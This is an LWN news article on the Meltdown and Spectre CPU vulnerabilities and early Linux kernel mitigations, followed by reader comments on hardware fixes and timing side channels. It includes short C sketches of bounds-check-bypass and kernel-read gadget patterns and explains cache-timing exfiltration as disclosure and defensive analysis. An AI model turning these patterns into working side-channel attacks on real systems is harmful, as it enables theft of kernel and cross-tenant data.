Notes from the Intelpocalypse

Benefits for LWN subscribers

The primary benefit from subscribing to LWN is helping to keep us publishing, but, beyond that, subscribers get immediate access to all site content and access to a number of extra site features. Please sign up today!

By Jonathan Corbet
January 4, 2018

Rumors of an undisclosed CPU security issue have been circulating since before LWN first covered the kernel page-table isolation patch set in November 2017. Now, finally, the information is out — and the problem is even worse than had been expected. Read on for a summary of these issues and what has to be done to respond to them in the kernel.

All three disclosed vulnerabilities take advantage of the CPU's speculative execution mechanism. In a simple view, a CPU is a deterministic machine executing a set of instructions in sequence in a predictable manner. Real-world CPUs are more complex, and that complexity has opened the door to some unpleasant attacks.

A CPU is typically working on the execution of multiple instructions at once, for performance reasons. Executing instructions in parallel allows the processor to keep more of its subunits busy at once, which speeds things up. But parallel execution is also driven by the slowness of access to main memory. A cache miss requiring a fetch from RAM can stall the execution of an instruction for hundreds of processor cycles, with a clear impact on performance. To minimize the amount of time it spends waiting for data, the CPU will, to the extent it can, execute instructions after the stalled one, essentially reordering the code in the program. That reordering is often invisible, but it occasionally leads to the sort of fun that caused Documentation/memory-barriers.txt to be written.

Out-of-order execution runs into a challenge whenever the code branches, though. The processor may not yet be able to tell which branch will be taken, so it doesn't know where to go to execute ahead of the stalled instruction(s). The answer here is "branch prediction". The processor will make a guess based on past experience with the branch in question and, possibly, explicit guidance from the code (the unlikely() directive used in kernel code, for example). Once the actual branch condition can be evaluated, the processor will determine whether it guessed right. If not, the "speculatively" executed instructions after the branch will be unwound, and everything will proceed as if they had never been run.

A branch-prediction failure should really only lead to slower execution, with no visible side effects. That turns out to not be the case, though, leading to a set of severe information-disclosure vulnerabilities. In particular, speculative instruction execution can cause data to be loaded into the CPU memory cache; timing attacks can then be used to learn which instructions were executed. If speculative execution of kernel code can be controlled by an attacker, the contents of the cache can be used as a covert channel to get data out of the kernel.

Getting around boundary checks

Perhaps the nastiest of the vulnerabilities, in terms of the cost of defending against them, allows the circumvention of normal boundary checks in the kernel. Imagine kernel code that looks like this:

    if (offset < array1->length) {
        unsigned char value = array1->data[offset];
      	unsigned long index = ((value&1)*0x100)+0x200;
      	if (index < array2->length) // length is < 0x300
            unsigned char value2 = array2->data[index];
     }

If offset is greater than the length of array1, the reference into array1->data should never happen. But if array1->length is not cached, the processor will stall on the test. It may, while waiting, predict that offset is within bounds (since it almost always is) and execute forward far enough to at least begin the fetch of the value from array2. Once it's clear that offset is too large, all of that speculatively done work will be discarded.

Except that array2->data[index] will be present in the CPU cache. An exploit can fetch the data at both 0x200 and 0x300 and compare the timings. If one is far faster than the other, then the faster one was cached. That means that the inner branch was speculatively executed and that, in particular, the lowest bit of value was not set. That leaks one bit of kernel memory under attacker control; a more sophisticated approach could, of course, obtain more than a lowest-order bit.

If a code pattern like the above exists in the kernel and offset is under user-space control, this kind of attack can be used to leak arbitrary data from the kernel to a user-space attacker. It would seem that such patterns exist, and that they can be used to read out kernel data at a relatively high rate. It is also possible to create the needed pattern with a BPF program — some types of which can be loaded and run without privilege. The attack is tricky to carry out, requires careful preparation of the CPU cache, and is processor-dependent, but it can be done. Intel, AMD, and ARM processors are all vulnerable (in varying degrees) to this attack.

There is no straightforward defense to this attack, and nothing has been merged to date. The only known technique, it would seem, is to prevent speculative execution of code within branches when the branch condition is under an attacker's control. That requires putting in a barrier after every test that is potentially vulnerable. Some preliminary patches have been posted to add a new API for sensitive pointer references:

    value = nospec_load(pointer, lower, upper);

This macro will return the value pointed to by pointer, but only if it falls within the given lower and upper bounds; otherwise zero is returned. There are a number of variants on this macro; see the documentation for the full set. This approach is problematic on a couple of counts: it hurts performance, and somebody has to find the vulnerable code patterns in the first place. Current vulnerabilities may be fixed, but there can be no doubt that new vulnerabilities of this type will be introduced on a regular basis.

Messing with indirect jumps

The kernel uses indirect jumps (calling a function through a pointer, for example) frequently. Branch prediction for indirect jumps uses cached results in a separate buffer that only keys on 31 bits of the address of interest. The resulting aliasing can be exploited to poison this cache and cause speculative execution to jump to the wrong location. Once again, the CPU will figure out that it got things wrong and unwind the results of the bad jump, but that speculative execution will leave traces in the memory cache. This issue can be exploited to cause the speculative execution of arbitrary code that will, once again, allow the exfiltration of data from the kernel.

One rather frightening aspect of this vulnerability is that an attacker running inside a virtualized guest can use it to leak data accessible to the hypervisor — all the data in the host system, in other words. That has all kinds of highly unpleasant implications for cloud providers. One can only hope that those providers have taken advantage of whatever early disclosure they got to update their systems.

There are two possible defenses in this case. One would be a microcode update from Intel that fixes the issue, for some processors at least. In the absence of this update, indirect calls must be replaced by a two-stage trampoline that will block further speculative execution. The performance cost of the trampoline will be notable, which is why Linus Torvalds has complained that the current patches seem to assume that the CPUs will never be fixed. There is a set of GCC patches forthcoming to add a flag (-mindirect-branch=thunk-extern) to automatically generate the trampolines in cases where that's necessary. As of this writing, no defenses have actually been merged into the mainline kernel.

Forcing direct cache loads

The final vulnerability runs entirely in user space, without the involvement of the kernel at all. Imagine a variant of the above code:

    if (slow_condition) {
        unsigned char value = kernel_data[offset];
      	unsigned long index = ((value&1)*0x100)+0x200;
      	if (index < length) 
            unsigned char value2 = array[index];
     }

Here, kernel_data is a kernel-space pointer that should be entirely inaccessible to a user-space program. The same speculative-execution issues, though, may cause the body of the outer if block (and possibly the inner block if the low bit of value is clear) to be executed on a speculative basis. By checking access timings, an attacker can determine the value of one bit of kernel_data[offset]. Of course, the attacker needs to find a useful kernel pointer in the first place, but a variant of this attack can be used to find the placement of the kernel in virtual memory.

The answer here is kernel page-table isolation, making the kernel-space data completely invisible to user space so that it cannot be used in speculative execution. This is the only one of the three issues that is addressed by page-table isolation; it alone imposes a performance cost of 5-30% or so. Intel and ARM processors seem to be vulnerable to this issue; AMD processors evidently are not.

The end result

What emerges is a picture of unintended processor functionality that can be exploited to leak arbitrary information from the kernel, and perhaps from other guests in a virtualized setting. If these vulnerabilities are already known to some attackers, they could have been using them to attack cloud providers for some time now. It seems fair to say that this is one of the most severe vulnerabilities to surface in some time.

The fact that it is based in hardware makes things significantly worse. We will all be paying the performance penalties associated with working around these problems for the indefinite future. For the owners of vast numbers of systems that cannot be updated, the consequences will be worse: they will remain vulnerable to a set of vulnerabilities with known exploits. This is not a happy time for the computing industry.

It is, to put it lightly, unlikely that this is the last vulnerability hiding within the processors at the heart of our systems. Like the Linux kernel, these processors are highly complex devices that are subject to constant change. And like the kernel, they probably have a number of unpleasant issues lurking within them. Given that, it's worthwhile to look at how these vulnerabilities were handled; there seems to be some unhappiness on that topic which might affect how future issues are disclosed. It's important to get this right, since we'll almost certainly be doing it again.

See also: the Meltdown and Spectre attacks page, which has a detailed and academic look at these vulnerabilities.

Index entries for this article
Kernel	Security/Meltdown and Spectre
Security	Hardware vulnerabilities
Security	Linux kernel
Security	Meltdown and Spectre

(Log in to post comments)

Notes from the Intelpocalypse

Posted Jan 4, 2018 0:53 UTC (Thu) by vbabka (subscriber, #91706) [Link]

Such a detailed and spot-on writeup within few hours from disclosure. Great job, Jon!

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:57 UTC (Thu) by rsidd (subscriber, #2582) [Link]

I'm awed at this. Jon is superhuman.

Notes from the Intelpocalypse

Posted Jan 10, 2018 1:28 UTC (Wed) by ThinkRob (guest, #64513) [Link]

One of the many examples that our subs support a vanishingly rare resource nowadays: actual journalism.

Seriously, well done LWN!

Notes from the Intelpocalypse

Posted Jan 4, 2018 2:30 UTC (Thu) by excors (subscriber, #95769) [Link]

> Intel and ARM processors seem to be vulnerable to this issue; AMD processors evidently are not.

ARM's information at https://developer.arm.com/support/security-update says the Meltdown issue ("variant 3") only affects Cortex-A75 (which is very new - I'm not sure it's in any shipping devices yet). Some more common ones (A15/A57/A72) are affected by "variant 3a", where you speculatively read a supposedly-inaccessible system register instead of memory, which is a less serious problem since system registers don't contain as much sensitive information as memory. I think that means most Android phone users don't need to worry much about it.

(But it looks like all the out-of-order ARMs are vulnerable to Spectre.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 3:15 UTC (Thu) by ariagolliver (subscriber, #85520) [Link]

Wouldn't all out-of-order chips are vulnerable to Spectre? I'd be interested to read how speculation and caching could coexist on the same chip without it being vulnerable to some kind of side-channel.

Notes from the Intelpocalypse

Posted Jan 4, 2018 3:25 UTC (Thu) by nix (subscriber, #2304) [Link]

I think you'd have to leave enough cache empty to satisfy likely ongoing speculation, evict material read into the cache to satisfy speculation iff the speculation fails, and *not* evict anything merely to free up cache to satisfy speculations (i.e. evict at retirement time, to keep a bit of space free).

Definitely a major change from the way caches work internally now, but not in any way impossible.

Notes from the Intelpocalypse

Posted Jan 4, 2018 7:53 UTC (Thu) by kentonv (✭ supporter ✭, #92073) [Link]

As noted in the paper, cache effects are not the only side effect of speculative execution. Other effects, like the amount of time spent speculating, seem difficult to hide...

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:36 UTC (Thu) by nix (subscriber, #2304) [Link]

I just babbled about possible high-res-timer-related mitigations here: <https://lwn.net/Articles/742867/>. All a bit painful (and with user-visible consequences if you actually *need* accurate high-res times many times a second) but a lot less painful than the reported KPTI slowdown, ISTM.

Notes from the Intelpocalypse

Posted Jan 4, 2018 19:40 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

It won't work, unless you also disable multi-threading totally. You can cobble up a high-resolution timer by having one thread do N writes to a buffer and the other thread observing a value at a fixed offset within this buffer.

Notes from the Intelpocalypse

Posted Jan 4, 2018 20:19 UTC (Thu) by bronson (subscriber, #4806) [Link]

If you have enough time to perform the attack, it won't work period. Even if I'm only allowed a very low resolution timer, I can compensate by performing lots of operations and running some statistics.

(In addition to being extremely well known for crypto timing attacks, it's how LIGO can measure 1/1000th of the width of a proton.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 20:37 UTC (Thu) by nix (subscriber, #2304) [Link]

"Performing lots of operations and running some statistics" probably slows the attack from a 500KiB/s flood down to a trickle, though. It seems a useful amelioration, at least.

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:44 UTC (Thu) by roc (subscriber, #30627) [Link]

But the multithreading approach Cyberax noted is a showstopper. Note that it also works with multiple single-threaded processes that share memory. It could even be made to work without shared memory, just with one process writing a counter to a file and another process reading it.

Even if you think you can fix all those (I don't see how), it's difficult to be confident people aren't going to come up with new ways to estimate time. And each mitigation you introduce degrades the user experience.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:55 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

Another one I've heard is to submit an asynchronous disk request and time its completion.

Notes from the Intelpocalypse

Posted Jan 5, 2018 17:26 UTC (Fri) by anselm (subscriber, #2796) [Link]

One important observation with covert channels is that in general, covert channels cannot be removed completely. Insisting that a system be 100% free of all conceivable covert channels is therefore not reasonable.

People doing security evaluations are usually satisfied when the covert channels that do inevitably exist provide such little bandwidth that they are, in practice, no longer useful to attackers.

Notes from the Intelpocalypse

Posted Jan 4, 2018 5:22 UTC (Thu) by jimzhong (subscriber, #112928) [Link]

I think one way is to redesign branch prediction so that when a misprediction occurs, in addition to flushing instructions in the mispredicted branch, the cache is also restored to the state before taking the branch. But this fix might be expensive.

Notes from the Intelpocalypse

Posted Jan 4, 2018 5:37 UTC (Thu) by sfeam (subscriber, #2841) [Link]

That might narrow the timing window but I don't think it would be sufficient to prevent the attack. The analysis of Spectre shows that hundreds of instructions may be executed speculatively before the misprediction is recognized, so snooping on the cache contents would still be possible during that interval.

Notes from the Intelpocalypse

Posted Jan 4, 2018 7:22 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

And so the ways to snoop on the cache contents should be curtailed.

Notes from the Intelpocalypse

Posted Jan 4, 2018 14:15 UTC (Thu) by droundy (subscriber, #4559) [Link]

Indeed, I wonder about the possibility of separate speculative caches. Sounds terribly expensive, though.

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:50 UTC (Thu) by roc (subscriber, #30627) [Link]

The only reasonable and watertight way to do that that I can think of is to partition the cache by protection domain. So cache lines would have owners: the kernel, specific user-space processes, and even within processes you'd want separate cache lines for JS vs the browser. A cache lookup would have to find a line owned by the current protection domain; if it did not, that has to be treated as a miss, and you would only be allowed to evict cache lines owned by the current domain.

It would hurt performance but what else would really work?

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:28 UTC (Thu) by rahvin (guest, #16953) [Link]

That sounds like a fix that would destroy cache effectiveness, you'd probably also enable a DOS attack that causes the cache to be partitioned until there isn't any cache left and things start locking up.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:40 UTC (Thu) by roc (subscriber, #30627) [Link]

There are probably ways to avoid lockup. I agree the performance impact would be bad. But what else really works?

Notes from the Intelpocalypse

Posted Jan 5, 2018 1:46 UTC (Fri) by rahvin (guest, #16953) [Link]

And we all thought heart-bleed was the worst thing ever, kinda pales in comparison to this.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:51 UTC (Thu) by sfeam (subscriber, #2841) [Link]

It's worse than you think. The use of cache as a side-channel was convenient for the proof-of-concept exploits but was not necessary. Mitigation that focuses on the cache rather than the speculative execution of invalid code is necessarily incomplete. The Spectre report notes: potential countermeasures limited to the memoryu cache are likely to be insufficient, since there are other ways that that speculative execution can leak information. For example, timing effects from memory bus contention, DRAM row address selection status, availability of virtual registers, ALU activity, [...] power and EM.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:00 UTC (Thu) by roc (subscriber, #30627) [Link]

Yeah, I read the paper. Just addressing the cache question since it was raised.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:57 UTC (Thu) by Cyberax (✭ supporter ✭, #52523) [Link]

Switchable caches (by PCID), perhaps?

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:01 UTC (Thu) by roc (subscriber, #30627) [Link]

That's basically the same as partitioning the cache, isn't it?

Notes from the Intelpocalypse

Posted Jan 5, 2018 0:03 UTC (Fri) by excors (subscriber, #95769) [Link]

Rather than restricting each domain to a tiny partition of the cache (which sounds painful for L1), perhaps you could let each domain use the whole cache (like now) but flush it every time you switch domain.

Then you'd want to rearchitect software to minimise the amount of domain-switching. E.g. instead of a syscall accessing protected data from the same core as the application, it would just be a stub that sends a message to a dedicated kernel core. Neither core would have to flush their own cache, and they couldn't influence each other's cache. Obviously you'd have to get rid of cache coherence (I don't see how your proposal would be compatible with coherence either), and split shared L2/L3 caches into dynamically-adjustable per-domain partitions, and no hyperthreading, etc.

Then maybe someone will notice that DRAM chips remember the last row that was accessed, so a core can touch one of two rows and another core can detect which one responds faster, and leak information that way. Then we'll have to partition DRAM by domain too.

Eventually we might essentially have a network of tiny PCs, each with its own CPU and RAM and disk and dedicated to a single protection domain, completely isolated from each other except for an Ethernet link.

Hmm, I'm not sure that will be good enough either: Spectre gets code in one domain (e.g. the kernel) to leak data into cache that affects the timing of a memory read in another domain (e.g. userspace), but couldn't it work with a purely kernel-only cache, if you simply find an easily-timeable kernel call that performs the memory read for you? Then it doesn't matter how far removed the attacker is from the target.

Notes from the Intelpocalypse

Posted Jan 5, 2018 13:44 UTC (Fri) by welinder (guest, #4699) [Link]

Even that might not be enough. If any information based on speculation has left
the cpu chip -- memory reads that reach the main memory -- then you might get
caching effects there.

I don't see tagging every memory location with an owner as a viable option.

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:46 UTC (Thu) by epa (subscriber, #39769) [Link]

In the third example I was surprised that the access through the kernel pointer didn't generate a memory protection fault. But then I remembered that it never really 'happened' because the if-condition is always false (but mispredicted as true). The issue is surely that speculative execution ignores the memory protection. The fix would be to limit speculative execution to memory that's definitely permitted (even if that means a few odd cases now get slower).

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:08 UTC (Thu) by excors (subscriber, #95769) [Link]

I don't think it's fair to say it ignores the memory protection - it fetches the value (from L1$) and just predicts that there won't be a fault, carries on speculatively executing as if there wasn't a fault, and then eventually checks the memory protection and unwinds (most of) the CPU state when it realises it predicted wrong. The problem is that the CPU's behaviour during the speculative part is subtly observable, and so the fetched value is observable.

The Meltdown PoC puts the memory read itself inside a speculative execution path, but I assume that's not strictly needed - it just makes the attack quicker/easier since you don't need to deal with a real page fault handler (because the fault gets unwound by the outer level of speculation).

Apparently the protection bits are stored alongside the data in L1$, so it seems like it shouldn't be expensive for the CPU to check those bits simultaneously with fetching the value, and then it can immediately replace the value with 0 or pretend it was a cache miss or whatever, so that it doesn't continue executing with the protected value. (But maybe it's more complicated than that in reality.)

Notes from the Intelpocalypse

Posted Jan 4, 2018 11:27 UTC (Thu) by MarcB (subscriber, #101804) [Link]

The last paragraph is basically what seems to be the difference between Intel and AMD, and why AMD is not affected by Meltdown: AMD checks permissions - and aborts, if permissions would be violated - before measurable side-effects occur, Intel afterwards.

But this has no effect on Spectre, which is based on speculative execution without crossing security boundaries.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:56 UTC (Thu) by marcH (subscriber, #57642) [Link]

> But this has no effect on Spectre, which is based on speculative execution without crossing security boundaries.

I don't understand: array1->data[offset] is out of boundaries. If it were not then what information would be leaked?

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:18 UTC (Thu) by rahvin (guest, #16953) [Link]

That it was in boundary. The point is you can find the boundaries I believe. Once you know the boundaries you can start extracting data beyond the boundaries a bit at a time after a number of cycles you've extracted something potentially valuable like login credentials or encryption keys.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:26 UTC (Thu) by marcH (subscriber, #57642) [Link]

I kept missing one of the main differences between meltdown and spectre: spectre runs in kernel space, meltdown doesn't. Sorry for the noise.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:52 UTC (Thu) by sfeam (subscriber, #2841) [Link]

Spectre is particularly nasty if the target code runs in kernel space, hence the concern about user-supplied BPF code. But that is a special case. The general case is that Spectre snoops information from any process you can persuade to execute the leaking code. The snooping is easiest if that is another thread in the same process (e.g. an un-sandboxed browser window). No kernel space is involved there.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:17 UTC (Thu) by samiam95124 (guest, #120873) [Link]

Sorry, that is just not true. You are mixing speculative and non-speculative execution.

Notes from the Intelpocalypse

Posted Jan 5, 2018 16:25 UTC (Fri) by MarcB (subscriber, #101804) [Link]

What do you mean?

My understanding of Meltdown is that it uses the limited speculative execution caused by classic pipelining+out-of-order execution (it does not use the advanced speculative execution that is used by Spectre). Or does it just use the reordering of stages, i.e. "read" before "check"?

It boldly accesses memory it is not allowed to access and then "defuses" the exception by forking beforehand and sacrificing the child process. Or it avoids exceptions by using TSX and rolling back. It then checks if a given address was loaded into cache or not by the forbidden access.

And apparently this does not work on AMD - and AMD claimed to never make speculative accesses to forbidden addresses - i.e. they must be checking earlier or never reorder "read" before "check".

However, I do not see, how AMD could do this with TSX; there allowing this forbidden access seems to be part of the spec. Or does Ryzen not have TSX?

Notes from the Intelpocalypse

Posted Jan 5, 2018 17:34 UTC (Fri) by foom (subscriber, #14868) [Link]

TSX isn't supposed to allow you to access memory you don't have permission to access, it just triggers a different response if you try – instead of a sigsegv, you get a transaction abort.

(Also, no, AMD doesn't implement it)

Notes from the Intelpocalypse

Posted Jan 6, 2018 14:58 UTC (Sat) by nix (subscriber, #2304) [Link]

It boldly accesses memory it is not allowed to access and then "defuses" the exception by forking beforehand and sacrificing the child process. Or it avoids exceptions by using TSX and rolling back. It then checks if a given address was loaded into cache or not by the forbidden access.

Nope. It boldly accesses memory and then uses the value read from that memory to read one of a variety of bits of memory it shares with the attacker, but it does all of that *behind a check which will fail*, so the reads are only ever done speculatively, and no exception is raised. Unfortunately the cache-loading done by that read still happens, and the hot cache is easily detectable by having the attacker time its own reads of the possible locations. (With more than two locations, you can exfiltrate more than one bit at once, possibly much more.)

Needless to say, if you have a way to exfiltrate the data other than a shared memory region, you can use it: the basic attack (relying on side-effects of speculations bound to fail) is the same.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:15 UTC (Thu) by samiam95124 (guest, #120873) [Link]

Its not that speculative exec "ignores memory protection", but that you can't cause exceptions based on what might not even happen. Go down that road and you would be causing faults everywhere.

The key to speculative execution is that it has to cause no side effects that would not be there if the processor didn't speculatively execute at all. Obviously there is one the CPU designers didn't think of, which is access time. That's what makes this exploit a really, really clever one.

Notes from the Intelpocalypse

Posted Jan 5, 2018 6:52 UTC (Fri) by epa (subscriber, #39769) [Link]

Sure, it can't cause a memory exception based on something that might not happen -- but ideally it shouldn't speculate accesses to memory which isn't accessible. Currently, I think it is fair to say that speculative execution 'ignores' the memory protection, in this example at least. The accessibility of the memory doesn't have any impact on what speculative execution does.

I suggest that if practical, speculative execution should take memory protection into account, and if it gets to the point where an exception would be triggered, just stop speculating at that point and don't actually fetch the value from memory.

The key to speculative execution is that it has to cause no side effects that would not be there if the processor didn't speculatively execute at all.

I think that is an impossible goal, at least if the purpose of speculation is to improve performance. The whole point of it is for the speedup side effects. So the effect of speculative execution will always be observable; what matters is to not speculatively execute (and make observable) operations which you would not be allowed to do in non-speculative execution.

Notes from the Intelpocalypse

Posted Jan 5, 2018 7:03 UTC (Fri) by Cyberax (✭ supporter ✭, #52523) [Link]

AMD checks permissions before speculatively executing stuff. But this doesn't protect against Spectre.

Notes from the Intelpocalypse

Posted Jan 10, 2018 11:35 UTC (Wed) by epa (subscriber, #39769) [Link]

You are right, I believe I was only talking about Meltdown, not Spectre.

The thought occurs that a processor could have two active permission modes: one for normal execution and one for speculation. So even though the processor is executing in kernel mode (Ring 0), speculative accesses still get the memory permissions associated with user space. So the transition from user to kernel space would be broken into two steps: first the processor switches to kernel mode but leaves speculative accesses unprivileged; later, once deep inside the kernel, an explicit instruction could enable speculative fetches to kernel memory too.

(That might still let you snoop on another userspace process, of course.)

Notes from the Intelpocalypse

Posted Jan 15, 2018 19:00 UTC (Mon) by ttonino (guest, #4073) [Link]

I'm afraid that all execution is speculative, but it is not rolled back afterwards.
Otherwise it would be easy to load cache lines with an extra bit 'speculative=1' and if non-speculative execution encountered such a line, regard it as invalid.
Sadly, that does not work: all execution is speculative, and most (?) of it is just not rolled back.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:10 UTC (Thu) by samiam95124 (guest, #120873) [Link]

I suspect the final hardware fix would be blinding the spec exec unit from unpermissioned pages. IE., you can't cause a fault from a speculative execution from a non-permissioned page, because that would give a fault where none would actually occur. But the CPU knows that the memory accessed is not in the user ring. Without redesigning the entire spec unit, you blind the data fetch by replacing it with, say, 0s. Then the side effects are not useful.

I suspect with time we will see several hardware fixes, but obviously with brand new CPUs.

Notes from the Intelpocalypse

Posted Jan 5, 2018 11:01 UTC (Fri) by epa (subscriber, #39769) [Link]

Or indeed you could change the way memory protection works altogether such that any access to a forbidden address returns zero and sets a processor flag to be checked asynchronously. (Speculative access would not set the flag.) The kernel could then kill the process a short while later if the flag is set. This would obviously make things less robust by allowing processes to continue blithely past bad pointer accesses, at least for a short while.

I think your proposal of returning zeroes only for speculative loads and faulting on the normal ones is preferable, if it can be implemented efficiently.

Notes from the Intelpocalypse

Posted Jan 4, 2018 15:19 UTC (Thu) by jcm (subscriber, #18262) [Link]

To be vulnerable to branch predictor abuse, you need to be able to train the predictor. If you (correctly) index your predictor using all of the bits of the VA, as opposed to the low order bits, you remove the most obvious route of attack. It's great we can finally talk about these problems together!

Notes from the Intelpocalypse

Posted Jan 4, 2018 16:36 UTC (Thu) by ortalo (guest, #4654) [Link]

Could you elaborate? (More specifically, what is the 'VA' here?)

Notes from the Intelpocalypse

Posted Jan 4, 2018 18:12 UTC (Thu) by jcm (subscriber, #18262) [Link]

At some point. Let's give this all time to settle down :)

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:51 UTC (Thu) by roc (subscriber, #30627) [Link]

VA = Virtual Address

Notes from the Intelpocalypse

Posted Jan 4, 2018 21:54 UTC (Thu) by roc (subscriber, #30627) [Link]

Seems like that would help user -> kernel attacks but not user -> user attacks.

Notes from the Intelpocalypse

Posted Jan 4, 2018 22:52 UTC (Thu) by jcm (subscriber, #18262) [Link]

Nah, it's VA+ASID/PCID. It's actually very simple to have a branch predictor that is safe against variant 2. You just need to have your index completely disambiguate against other live contexts. The only problem with this is it's more bits to compare, but as compared to not having any branch prediction within one of the contexts, or flushing the predictor, I know which I prefer. I expect all of the vendors to make this relatively trivial fix in future silicon and then apply CONFIG_MARKETING to over hype it.

Notes from the Intelpocalypse

Posted Jan 4, 2018 23:02 UTC (Thu) by roc (subscriber, #30627) [Link]

That makes sense, although in my defense you did say "all the bits of the VA" :-).

Notes from the Intelpocalypse

Posted Jan 10, 2018 15:26 UTC (Wed) by anton (subscriber, #25547) [Link]

Normally branch predictors don't tag (and check) their entries at all, they just use a bunch of bits (possibly after mixing them in a non-cryptographic way) to index into the table and use whatever prediction they find there (no prediction is just as bad for performance as misprediction, so they don't bother checking). Having the ASID as tag would be enough to avoid getting the predictor primed by an attacking process (won't help against an attack from untrusted code within the same process (e.g., JavaScript code), though).

Other approaches for fixing the hardware without throwing out the baby with the bathwater could be to put any loaded cache lines in an enhanced version of the store buffer until speculation is resolved; and to (weakly) encrypt the address bits when accessing various shared hardware structures, combined with changing the secret frequently. I guess there are others, too.

more vulnerabilities to be found

Posted Jan 4, 2018 2:34 UTC (Thu) by jimzhong (subscriber, #112928) [Link]

Branch prediction, speculative execution, caches are all in classic computer architecture textbooks. Whoever came up with these exploits are brilliant. I think people will find more vulnerabilities like these.

more vulnerabilities to be found

Posted Jan 4, 2018 15:21 UTC (Thu) by jcm (subscriber, #18262) [Link]

See page B-37 of both the current and previous editions of Computer Architecture, where it explicitly says you should perform the permission check during speculation. I've been keeping that reference ready to point folks at ;)

more vulnerabilities to be found

Posted Jan 4, 2018 15:45 UTC (Thu) by jimzhong (subscriber, #112928) [Link]

Checking permissions can prevent the Meltdown attack which is specific to Intel processors. I doubts whether it can prevent Spectre.

more vulnerabilities to be found

Posted Jan 4, 2018 15:56 UTC (Thu) by jcm (subscriber, #18262) [Link]

Indeed, but as I said elsewhere in the thread, you can mitigate branch predictor abuse if you correctly index your predictor based upon the full address space (including ASID/PCID/etc.). The hardware fix for variant 2 isn't actually as bad as people claim.

more vulnerabilities to be found

Posted Jan 4, 2018 22:39 UTC (Thu) by roc (subscriber, #30627) [Link]

That's only part of the Spectre attack though.

Even if vendors manage to plug all the stuff in the Spectre paper, a big question is whether there are more big "leaking secrets through hidden CPU state using side channel" attacks that will be found soon, now that everyone's looking. I wouldn't bet against it. In which case we could be in for a long period of scrambling, patching, and performance-eroding mitigations.

more vulnerabilities to be found

Posted Jan 4, 2018 22:54 UTC (Thu) by jcm (subscriber, #18262) [Link]

Indeed. I co-lead the mitigation team within Red Hat for some time on this issue. It's allowed for a few productive conversations around potential future research. I've already spoken with those involved in this research, and similar related efforts. Red Hat turned up to MICRO50 last year, which wasn't on accident. I'm trying to drive more direct engagement with the architecture community, and especially now that we can work with the vendors and researchers to help find the next one. I'd really like it to be RH finding it next time.

more vulnerabilities to be found

Posted Jan 4, 2018 23:07 UTC (Thu) by roc (subscriber, #30627) [Link]

I hope you and your colleagues in the early-disclosure zone are reflecting on whether the "patch and pray" approach to stopping these leaks is sustainable long-term. For example, it was pointed out that retpolines break Intel's CET, i.e. one mitigation stomps on another. Each mitigation makes the system more complex and fragile ... and a lot of them make it slower, too.

I realize you have to do these mitigations for now, but I think some serious long-term thinking needs to be going on alongside the stop-gap work.

more vulnerabilities to be found

Posted Jan 4, 2018 23:20 UTC (Thu) by roc (subscriber, #30627) [Link]

Er, retract that CET point. Apparently it is possible to have a CET-compatible reptoline.

more vulnerabilities to be found

Posted Jan 4, 2018 23:14 UTC (Thu) by rahvin (guest, #16953) [Link]

But the hardware fix is not a quick fix and the concern is of course about permutations of this attack that exploit similar functions.

Spectre appears to lie at the heart of CPU design assumptions and will likely be around causing problems for a very long time as people figure out new ways to do the same thing using various other similar assumptions. As someone else said the person that came up with this was brilliant and it's going to have very far reaching consequences.

Notes from the Intelpocalypse

Posted Jan 4, 2018 3:08 UTC (Thu) by vstinner (subscriber, #42675) [Link]

The article title is misleading. The article says "Intel, AMD, and ARM processors are all vulnerable (in varying degrees) to this attack." Why focusing only on Intel? The bug affects multiple CPU vendors.

Notes from the Intelpocalypse

Posted Jan 4, 2018 6:51 UTC (Thu) by comicfans (subscriber, #117233) [Link]

https://meltdownattack.com/meltdown.pdf
takes intel cpu as attack target and successfully leak kernel information. it can also use Intel TSX to get higher channel capacity .for AMD and ARM, "We also tried to reproduce the Meltdown bug on several
ARM and AMD CPUs. However, we did not manage
to successfully leak kernel memory with the attack described
in Section 5, neither on ARM nor on AMD." ... "However, for both ARM and AMD, the toy
example as described in Section 3 works reliably"

Notes from the Intelpocalypse

Posted Jan 4, 2018 7:42 UTC (Thu) by roc (subscriber, #30627) [Link]

Yes, I think the title is a bit harsh. Meltdown may be Intel-specific, but the underlying issues certainly aren't.

Notes from the Intelpocalypse

Posted Jan 4, 2018 9:23 UTC (Thu) by valberg (guest, #83862) [Link]

I agree. The title is very misleading (and actually unfair) and should be corrected.

Notes from the Intelpocalypse

Posted Jan 4, 2018 3:34 UTC (Thu) by atelszewski (guest, #111673) [Link]

Hi,

I would love to hear an authoritative statement,
how all of this affect single-user desktops?

What is the attack channel?
For example, JavaScript in a browser?
If so, how long would it take to extract useful data?

No doubt it is serious thing, because many (most?) of the services we
relay on, are somewhere out there, in multi-user (server) environments.

But, how safe are my locally kept passwords?
(Except for those I transmit to my banks website ;-)).

--
Best regards,
Andrzej Telszewski

Notes from the Intelpocalypse

Posted Jan 4, 2018 4:27 UTC (Thu) by corbet (editor, #1) [Link]

There is, for example, this advisory from Mozilla on how it could be used to access information in a web browser.

Notes from the Intelpocalypse

Posted Jan 4, 2018 4:43 UTC (Thu) by atelszewski (guest, #111673) [Link]

Hi,

Wow, I wouldn't have ever thought that browsers allow for sub 1-ms time measurements.
